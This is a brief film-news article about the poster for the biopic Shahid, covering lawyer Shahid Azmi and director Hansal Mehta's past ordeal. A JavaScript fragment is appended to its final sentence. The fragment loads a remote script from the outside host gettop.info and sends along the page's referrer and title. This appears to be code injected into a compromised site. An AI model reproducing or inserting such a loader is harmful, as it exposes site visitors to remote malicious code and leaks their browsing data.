Film-makers, writers, poets, artists; creative people of all sorts tend to add elements from their lives into the fiction they weave. Some see this as a form of release while others view this as a method to overcome the trauma. Nevertheless, they usually re-live incidents and instances in their life by depicting them in their writings, films, paintings, etc and also immortalize the instances. This is the reason why the upcoming movie Shahid‘s poster looks the way it does.
The movie is based on the life of a criminal defense lawyer Shahid Azmi, who was also a human rights activist. Shahid Azmi specialized in acquitting persons who were falsely accused and imprisoned. He was assassinated in 2010 while he was defending one of the accused in the 26/11 Mumbai Attacks.
The movie’s poster was unveiled recently and it shows the actor Rajkumar Yadav’s (who is playing the role of Shahid Azmi) face blackened. This is reportedly based on an incident in the director Hansal Mehta’s life. Over a decade ago, when the director’s movie Dil Pe Mat Le Yaar was released, his face was blackened and his office was vandalized by the ‘moral’ police. The director seemed to have re-lived the demonic incident in his life through this movie.
Directed by Hansal Mehta and produced by Anurag Kashyap, this movie releases on October 18.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);
